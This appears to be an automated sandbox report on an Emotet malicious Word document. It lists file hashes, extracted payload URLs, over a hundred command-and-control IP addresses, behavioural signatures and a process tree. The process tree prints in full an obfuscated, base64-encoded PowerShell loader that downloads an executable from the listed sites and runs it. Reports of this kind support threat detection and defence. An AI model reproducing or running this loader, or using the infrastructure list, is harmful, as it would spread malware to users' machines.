Analysis
-
max time kernel
54s -
max time network
62s -
platform
windows10_x64 -
resource
win10 -
submitted
27-10-2020 16:57
Static task
static1
General
-
Target
emotet_e2_9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893_2020-10-27__165503960551._fpx.doc
-
Size
179KB
-
MD5
195b26f04a16b641bdcecc5084ca815d
-
SHA1
8b87e7f06c75a926103c28fd0b7b8fab532af1a4
-
SHA256
9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893
-
SHA512
54591f496f64ecbb54158c0c175a3499b4cd7fc346bef6a5439f31f783068dcefc4f626f0e11d72607817103fa9e6c9fb0e85ef4ce146cec491dcd3d0aed3236
Malware Config
Extracted
http://car4libya.com/cgi-bin/sDBhPqx/
http://ostranderandassociates.com/var/thpY/
http://acredales.com/thank_you/U0u9Z/
http://scw8.net/wp-content/1MkWc/
https://adinterix.com/laybuy-investors/9Ab6/
http://uxnew.com/old/9/
http://www.queensport.nl/accp/dz/
https://bahamianrelief.org/VpHo/ey/
Extracted
emotet
Epoch2
67.163.161.107:80
107.170.146.252:8080
173.212.214.235:7080
167.114.153.111:8080
185.94.252.104:443
110.142.236.207:80
194.187.133.160:443
218.147.193.146:80
172.104.97.173:8080
216.139.123.119:80
50.91.114.38:80
202.134.4.211:8080
113.61.66.94:80
139.99.158.11:443
62.171.142.179:8080
37.139.21.175:8080
190.108.228.27:443
94.23.237.171:443
154.91.33.137:443
201.241.127.190:80
37.179.204.33:80
110.145.77.103:80
72.186.136.247:443
78.24.219.147:8080
200.116.145.225:443
47.36.140.164:80
168.235.67.138:7080
61.76.222.210:80
121.124.124.40:7080
202.134.4.216:8080
190.164.104.62:80
61.19.246.238:443
61.33.119.226:443
98.174.164.72:80
121.7.31.214:80
190.162.215.233:80
24.179.13.119:80
68.252.26.78:80
142.112.10.95:20
220.245.198.194:80
138.68.87.218:443
203.153.216.189:7080
87.106.136.232:8080
95.9.5.93:80
91.146.156.228:80
104.131.11.150:443
5.39.91.110:7080
94.230.70.6:80
209.141.54.221:7080
62.75.141.82:80
172.105.13.66:443
120.150.60.189:80
66.76.12.94:8080
72.143.73.234:443
209.54.13.14:80
172.91.208.86:80
24.178.90.49:80
41.185.28.84:8080
176.113.52.6:443
50.245.107.73:443
176.111.60.55:8080
97.82.79.83:80
85.105.111.166:80
124.41.215.226:80
119.59.116.21:8080
194.4.58.192:7080
115.94.207.99:443
75.143.247.51:80
217.123.207.149:80
162.241.140.129:8080
104.131.123.136:443
50.35.17.13:80
59.125.219.109:443
118.83.154.64:443
37.187.72.193:8080
157.245.99.39:8080
174.106.122.139:80
186.70.56.94:443
186.74.215.34:80
24.230.141.169:80
46.105.131.79:8080
91.211.88.52:7080
172.86.188.251:8080
139.59.60.244:8080
109.74.5.95:8080
190.29.166.0:80
188.219.31.12:80
194.190.67.75:80
182.208.30.18:443
123.142.37.166:80
2.58.16.89:8080
62.30.7.67:443
75.188.96.231:80
123.176.25.234:80
108.46.29.236:80
89.121.205.18:80
78.188.106.53:443
76.175.162.101:80
95.213.236.64:8080
24.137.76.62:80
202.141.243.254:443
184.180.181.202:80
74.214.230.200:80
187.161.206.24:80
68.115.186.26:80
103.86.49.11:8080
190.240.194.77:443
120.150.218.241:443
79.137.83.50:443
49.50.209.131:80
173.63.222.65:80
134.209.144.106:443
112.185.64.233:80
27.114.9.93:80
87.106.139.101:8080
96.245.227.43:80
93.147.212.206:80
139.162.60.124:8080
102.182.93.220:80
89.216.122.92:80
137.59.187.107:8080
74.208.45.104:8080
71.15.245.148:8080
49.3.224.99:8080
94.200.114.161:80
217.20.166.178:7080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POwersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3040 3996 POwersheLL.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral1/memory/1636-12-0x0000000000A10000-0x0000000000A30000-memory.dmp emotet behavioral1/memory/1636-13-0x0000000000A30000-0x0000000000A4E000-memory.dmp emotet behavioral1/memory/512-16-0x00000000004F0000-0x0000000000510000-memory.dmp emotet behavioral1/memory/512-17-0x0000000000530000-0x000000000054E000-memory.dmp emotet -
Blacklisted process makes network request 1 IoCs
Processes:
POwersheLL.exeflow pid process 20 3040 POwersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
F1iv94s.exeqcap.exepid process 1636 F1iv94s.exe 512 qcap.exe -
Drops file in System32 directory 1 IoCs
Processes:
F1iv94s.exedescription ioc process File opened for modification C:\Windows\SysWOW64\msra\qcap.exe F1iv94s.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3964 WINWORD.EXE 3964 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POwersheLL.exeqcap.exepid process 3040 POwersheLL.exe 3040 POwersheLL.exe 3040 POwersheLL.exe 512 qcap.exe 512 qcap.exe 512 qcap.exe 512 qcap.exe 512 qcap.exe 512 qcap.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POwersheLL.exedescription pid process Token: SeDebugPrivilege 3040 POwersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3964 WINWORD.EXE 3964 WINWORD.EXE 3964 WINWORD.EXE 3964 WINWORD.EXE 3964 WINWORD.EXE 3964 WINWORD.EXE 3964 WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
F1iv94s.exedescription pid process target process PID 1636 wrote to memory of 512 1636 F1iv94s.exe qcap.exe PID 1636 wrote to memory of 512 1636 F1iv94s.exe qcap.exe PID 1636 wrote to memory of 512 1636 F1iv94s.exe qcap.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_9f01a1f41afb800dc19b023fa3a864efcc17a6c0624897ae4326e695ceb6d893_2020-10-27__165503960551._fpx.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exePOwersheLL -ENCOD IAAgAFMAZQBUAC0ASQBUAGUATQAgAFYAYQByAEkAQQBiAEwARQA6AE0AQgBPAE4AOAA5ACAAIAAoACAAWwBUAHkAUABlAF0AKAAiAHsAMAB9AHsANAB9AHsAMwB9AHsAMQB9AHsAMgB9ACIALQBmACcAcwAnACwAJwAuAEQASQByACcALAAnAGUAYwBUAG8AUgB5ACcALAAnAGkATwAnACwAJwB5AHMAdABlAG0ALgAnACkAKQA7ACQAYQA0AGcAZQBLACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADAAfQB7ADYAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADMAfQB7ADIAfQB7ADEAfQB7ADUAfQAiAC0AZgAgACcAcwBZACcALAAnAEkATgBUAG0AQQBOAEEAZwBlACcALAAnAFAATwAnACwAJwBjAEUAJwAsACcAbgBFAFQAJwAsACcAUgAnACwAJwBzAHQAZQAnACwAJwBtAC4AJwAsACcALgBTAGUAcgBWAEkAJwApADsAJABUAHUAegAzAHEANAA2AD0AKAAoACcARwA3ACcAKwAnAGQAJwApACsAKAAnADUAJwArACcAbwAxAG4AJwApACkAOwAkAEcAXwBqAHUAXwAxAGwAPQAkAEEAcgB4AGoAYQA5AHEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUANgB0ADEAdQBzAGsAOwAkAE4AZQA1AHEAYgB0ADMAPQAoACgAJwBEAHQAJwArACcANgAnACkAKwAoACcAagBvACcAKwAnADEAJwApACsAJwB4ACcAKQA7ACAAKAB2AGEAcgBJAEEAYgBsAEUAIAAgAE0AQgBPAE4AOAA5ACAAIAAtAFYAQQBsAFUARQBvAG4ATAApADoAOgAiAEMAYABSAEUAYQBUAEUAYABEAGkAcgBFAGAAYwBUAG8AYABSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEQAWAAnACsAJwAxACcAKwAnAE4AXwBqACcAKQArACgAJwBkAGUAJwArACcAcwAnACkAKwAoACcAdQAnACsAJwBEAFgAMQBOADYAcQAnACsAJwB3ADAAJwArACcAegAnACkAKwAoACcAcgBEACcAKwAnAFgAJwApACsAJwAxACcAKQAuACIAcgBlAFAAYABMAGEAYABjAGUAIgAoACgAJwBEAFgAJwArACcAMQAnACkALAAnAFwAJwApACkAKQA7ACQATQAwAHYAcwBjAGgAZQA9ACgAJwBDACcAKwAoACcAaQB4AHcAJwArACcAawAnACkAKwAnAGUAZwAnACkAOwAgACgAIAAgAEMAaABpAEwARABJAFQAZQBNACAAIAB2AEEAcgBJAEEAYgBsAEUAOgBBADQAZwBFAEsAKQAuAHYAYQBMAFUARQA6ADoAIgBzAGAAZQBDAHUAcgBgAEkAdABZAFAAUgBPAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABQAHUAbABqADcAOQBxAD0AKAAnAFMAJwArACgAJwA4AGUAcwBjAGgAJwArACcAYwAnACkAKQA7ACQARgBsAHoAZwBqAGoAYgAgAD0AIAAoACgAJwBGADEAJwArACcAaQB2ACcAKQArACgAJwA5ADQAJwArACcAcwAnACkAKQA7ACQAQQBhAG4ANQA4AGcAcQA9ACgAKAAnAEkAZQAnACsAJwB5ADYAJwApACsAKAAnAHAAbwAnACsAJwA5ACcAKQApADsAJABOAGQANABmAGMAdwAyAD0AKAAoACcARABnAG8AdQAnACsAJwA4ACcAKQArACcAdwAnACsAJwA0ACcAKQA7ACQAUwBtAGUAbQA1AHkAagA9ACQASABPAE0ARQArACgAKAAoACcAYwBTACcAKwAnAGsAJwApACsAJwBOAF8AJwArACgAJwBqAGQAJwArACcAZQAnACkAKwAnAHMAJwArACgAJwB1ACcAKwAnAGMAUwBrACcAKwAnAE4ANgBxAHcAJwApACsAKAAnADAAegAnACsAJwByACcAKwAnAGMAUwBrACcAKQApACAALQBSAEUAUABsAGEAQwBlACAAIAAoAFsAQwBIAGEAcgBdADkAOQArAFsAQwBIAGEAcgBdADgAMwArAFsAQwBIAGEAcgBdADEAMAA3ACkALABbAEMASABhAHIAXQA5ADIAKQArACQARgBsAHoAZwBqAGoAYgArACgAKAAnAC4AJwArACcAZQB4ACcAKQArACcAZQAnACkAOwAkAEIAXwBqADcAdQB4AHYAPQAoACcATAAnACsAKAAnAGUAJwArACcAZgAwACcAKQArACgAJwB0AGkAJwArACcAYQAnACkAKQA7ACQATwBuAG8AXwBxAGkANQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQAUgAzAGkAeQA4AHgANgA9ACgAJwBoACcAKwAnAHQAJwArACgAJwB0ACcAKwAnAHAAOgBbACcAKwAnACAAdwBlACAAXQAnACkAKwAoACcAWwAgAHcAJwArACcAZQAnACkAKwAoACcAIABdAGMAYQAnACsAJwByACcAKQArACgAJwA0AGwAaQBiACcAKwAnAHkAYQAnACkAKwAoACcALgAnACsAJwBjAG8AbQBbACAAJwApACsAJwB3ACcAKwAoACcAZQAnACsAJwAgACcAKwAnAF0AJwArACcAYwBnAGkALQBiAGkAbgAnACkAKwAoACcAWwAnACsAJwAgACcAKwAnAHcAZQAgAF0AcwBEAEIAJwApACsAKAAnAGgAJwArACcAUABxACcAKQArACcAeABbACcAKwAoACcAIAAnACsAJwB3AGUAJwApACsAJwAgACcAKwAnAF0AJwArACgAJwBAACcAKwAnAGgAdAB0ACcAKQArACgAJwBwADoAWwAnACsAJwAgACcAKQArACcAdwAnACsAKAAnAGUAIABdAFsAIAB3AGUAJwArACcAIABdACcAKQArACgAJwBvAHMAJwArACcAdAByAGEAJwApACsAJwBuACcAKwAoACcAZABlAHIAJwArACcAYQBuAGQAJwArACcAYQAnACkAKwAoACcAcwBzACcAKwAnAG8AYwAnACsAJwBpAGEAdAAnACsAJwBlAHMAJwApACsAKAAnAC4AYwBvAG0AWwAgAHcAJwArACcAZQAgACcAKwAnAF0AJwApACsAKAAnAHYAYQAnACsAJwByACcAKQArACgAJwBbACAAJwArACcAdwAnACkAKwAoACcAZQAgAF0AdAAnACsAJwBoAHAAWQBbACcAKQArACcAIAB3ACcAKwAoACcAZQAgAF0AJwArACcAQABoACcAKwAnAHQAdABwADoAJwArACcAWwAgACcAKwAnAHcAZQAgAF0AWwAgACcAKQArACgAJwB3AGUAJwArACcAIABdAGEAYwAnACsAJwByAGUAZABhACcAKwAnAGwAZQAnACkAKwAnAHMAJwArACgAJwAuACcAKwAnAGMAbwBtAFsAJwApACsAKAAnACAAdwBlACAAXQAnACsAJwB0ACcAKwAnAGgAJwApACsAJwBhACcAKwAoACcAbgBrACcAKwAnAF8AJwApACsAKAAnAHkAbwAnACsAJwB1ACcAKQArACgAJwBbACcAKwAnACAAdwBlACAAJwApACsAKAAnAF0AVQAnACsAJwAwACcAKQArACgAJwB1ACcAKwAnADkAWgAnACsAJwBbACAAdwBlACcAKwAnACAAXQBAAGgAdAAnACsAJwB0AHAAOgBbACAAdwBlACcAKQArACgAJwAgAF0AWwAgACcAKwAnAHcAJwArACcAZQAgAF0AJwApACsAJwBzACcAKwAnAGMAJwArACgAJwB3ACcAKwAnADgALgBuAGUAdAAnACkAKwAoACcAWwAgAHcAJwArACcAZQAnACkAKwAnACAAXQAnACsAKAAnAHcAcAAtACcAKwAnAGMAbwBuAHQAZQBuACcAKwAnAHQAWwAgAHcAZQAgACcAKQArACgAJwBdADEATQBrACcAKwAnAFcAJwApACsAKAAnAGMAJwArACcAWwAnACsAJwAgAHcAZQAgAF0AQABoACcAKQArACgAJwB0ACcAKwAnAHQAcABzACcAKQArACcAOgBbACcAKwAnACAAJwArACgAJwB3AGUAJwArACcAIABdACcAKQArACcAWwAnACsAJwAgACcAKwAoACcAdwBlACcAKwAnACAAXQBhAGQAaQAnACkAKwAnAG4AJwArACgAJwB0ACcAKwAnAGUAcgBpAHgALgAnACkAKwAoACcAYwBvAG0AWwAgACcAKwAnAHcAJwArACcAZQAnACkAKwAnACAAXQAnACsAKAAnAGwAYQB5ACcAKwAnAGIAdQB5ACcAKwAnAC0AaQBuAHYAJwApACsAKAAnAGUAcwAnACsAJwB0ACcAKwAnAG8AcgBzAFsAJwArACcAIAB3AGUAIABdACcAKwAnADkAQQBiADYAWwAgAHcAJwApACsAKAAnAGUAIABdAEAAaAB0ACcAKwAnAHQAcAAnACsAJwA6AFsAJwArACcAIAAnACkAKwAoACcAdwAnACsAJwBlACAAJwApACsAJwBdACcAKwAoACcAWwAgAHcAZQAgAF0AdQAnACsAJwB4ACcAKwAnAG4AJwApACsAJwBlAHcAJwArACcALgBjACcAKwAoACcAbwAnACsAJwBtAFsAIAB3ACcAKwAnAGUAIABdAG8AJwApACsAKAAnAGwAZABbACAAJwArACcAdwAnACkAKwAoACcAZQAgACcAKwAnAF0AOQBbACcAKQArACcAIAB3ACcAKwAnAGUAJwArACgAJwAgACcAKwAnAF0AQAAnACkAKwAnAGgAdAAnACsAJwB0ACcAKwAoACcAcAA6AFsAJwArACcAIAAnACsAJwB3AGUAIABdACcAKwAnAFsAJwApACsAKAAnACAAdwBlACcAKwAnACAAXQB3AHcAJwApACsAKAAnAHcALgAnACsAJwBxACcAKQArACgAJwB1AGUAJwArACcAZQAnACkAKwAoACcAbgAnACsAJwBzAHAAbwByAHQALgBuACcAKwAnAGwAWwAgAHcAJwArACcAZQAnACsAJwAgAF0AYQAnACsAJwBjAGMAJwApACsAKAAnAHAAWwAgACcAKwAnAHcAZQAnACkAKwAoACcAIABdAGQAegAnACsAJwBbACAAdwAnACsAJwBlACcAKwAnACAAXQAnACsAJwBAAGgAdAAnACsAJwB0AHAAcwA6ACcAKQArACgAJwBbACcAKwAnACAAdwBlACcAKQArACgAJwAgAF0AJwArACcAWwAgAHcAJwArACcAZQAgAF0AYgBhACcAKQArACgAJwBoACcAKwAnAGEAbQAnACkAKwAoACcAaQBhAG4AJwArACcAcgBlACcAKwAnAGwAaQBlAGYAJwApACsAJwAuAG8AJwArACgAJwByAGcAWwAnACsAJwAgAHcAJwArACcAZQAgAF0AJwApACsAKAAnAFYAJwArACcAcAAnACsAJwBIAG8AWwAgAHcAZQAgACcAKwAnAF0AZQB5AFsAIAAnACkAKwAoACcAdwAnACsAJwBlACAAXQAnACkAKQAuACIAcgBgAGUAYABQAGwAYQBDAGUAIgAoACgAJwBbACAAJwArACcAdwBlACcAKwAnACAAXQAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAJwBmAHMAJwApAFsAMABdACkALgAiAFMAYABQAEwAaQB0ACIAKAAkAFUAeQBjADYAXwBtAGoAIAArACAAJABHAF8AagB1AF8AMQBsACAAKwAgACQASABxAHkAMQAzADgAZQApADsAJABJADcANABxAGYAYgBhAD0AKAAoACcATQBrACcAKwAnAHoAMAByACcAKQArACcAMwBuACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQASwAzAGQAeABzAG0ANQAgAGkAbgAgACQAUgAzAGkAeQA4AHgANgApAHsAdAByAHkAewAkAE8AbgBvAF8AcQBpADUALgAiAGQAbwB3AGAATgBsAE8AQQBEAGAARgBJAEwARQAiACgAJABLADMAZAB4AHMAbQA1ACwAIAAkAFMAbQBlAG0ANQB5AGoAKQA7ACQARQB1ADIAaQB1ADAANAA9ACgAJwBTADYAJwArACgAJwB3AGQAJwArACcAMAA3ADIAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQAUwBtAGUAbQA1AHkAagApAC4AIgBMAEUAbgBgAGcAdABoACIAIAAtAGcAZQAgADQAMAA5ADcAMwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAaQAnACsAKAAnAG4AMwAyAF8AJwArACcAUAAnACkAKwAoACcAcgBvACcAKwAnAGMAZQAnACkAKwAnAHMAcwAnACkAKQAuACIAQwBSAGAAZQBgAEEAVABlACIAKAAkAFMAbQBlAG0ANQB5AGoAKQA7ACQASwB4AHkAcQB2AHoAMwA9ACgAKAAnAEUAbQAnACsAJwAxACcAKQArACcAeABsACcAKwAnADkAcwAnACkAOwBiAHIAZQBhAGsAOwAkAFQAdQBoAGYANwBoAG4APQAoACcAQgAnACsAKAAnADIAJwArACcAawBwACcAKQArACgAJwA4ACcAKwAnADkAeAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAAwAGMAZgB6AHIAdgA9ACgAJwBaAHYAJwArACgAJwBuAHcAZAAnACsAJwBjAG8AJwApACkA1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exeC:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msra\qcap.exe"C:\Windows\SysWOW64\msra\qcap.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exeMD5
73b86e608cfac43a4ea0d3529b1af758
SHA13b6f8aa2ab1fd4930fde3bb80f213a7fa866f5b6
SHA2565f3e68bbf85cf781c02d6425366b62f0d069e263026b4edaf0f993bc3f4a80a5
SHA512e973e3b874ecb8c2ef9bb7056320c0ded679d999dfbd9da0b961fefa656fb2b3f589b86ee89417e92a634611f375bbb74c525fdecb876e653ffc73c0e0635fb4
-
C:\Users\Admin\N_jdesu\N6qw0zr\F1iv94s.exeMD5
73b86e608cfac43a4ea0d3529b1af758
SHA13b6f8aa2ab1fd4930fde3bb80f213a7fa866f5b6
SHA2565f3e68bbf85cf781c02d6425366b62f0d069e263026b4edaf0f993bc3f4a80a5
SHA512e973e3b874ecb8c2ef9bb7056320c0ded679d999dfbd9da0b961fefa656fb2b3f589b86ee89417e92a634611f375bbb74c525fdecb876e653ffc73c0e0635fb4
-
C:\Windows\SysWOW64\msra\qcap.exeMD5
73b86e608cfac43a4ea0d3529b1af758
SHA13b6f8aa2ab1fd4930fde3bb80f213a7fa866f5b6
SHA2565f3e68bbf85cf781c02d6425366b62f0d069e263026b4edaf0f993bc3f4a80a5
SHA512e973e3b874ecb8c2ef9bb7056320c0ded679d999dfbd9da0b961fefa656fb2b3f589b86ee89417e92a634611f375bbb74c525fdecb876e653ffc73c0e0635fb4
-
memory/512-14-0x0000000000000000-mapping.dmp
-
memory/512-16-0x00000000004F0000-0x0000000000510000-memory.dmpFilesize
128KB
-
memory/512-17-0x0000000000530000-0x000000000054E000-memory.dmpFilesize
120KB
-
memory/1636-12-0x0000000000A10000-0x0000000000A30000-memory.dmpFilesize
128KB
-
memory/1636-13-0x0000000000A30000-0x0000000000A4E000-memory.dmpFilesize
120KB
-
memory/3040-7-0x00007FFCA89C0000-0x00007FFCA93AC000-memory.dmpFilesize
9.9MB
-
memory/3040-8-0x000002861B020000-0x000002861B021000-memory.dmpFilesize
4KB
-
memory/3040-9-0x000002861B050000-0x000002861B051000-memory.dmpFilesize
4KB
-
memory/3964-0-0x00007FFCAFB50000-0x00007FFCB0187000-memory.dmpFilesize
6.2MB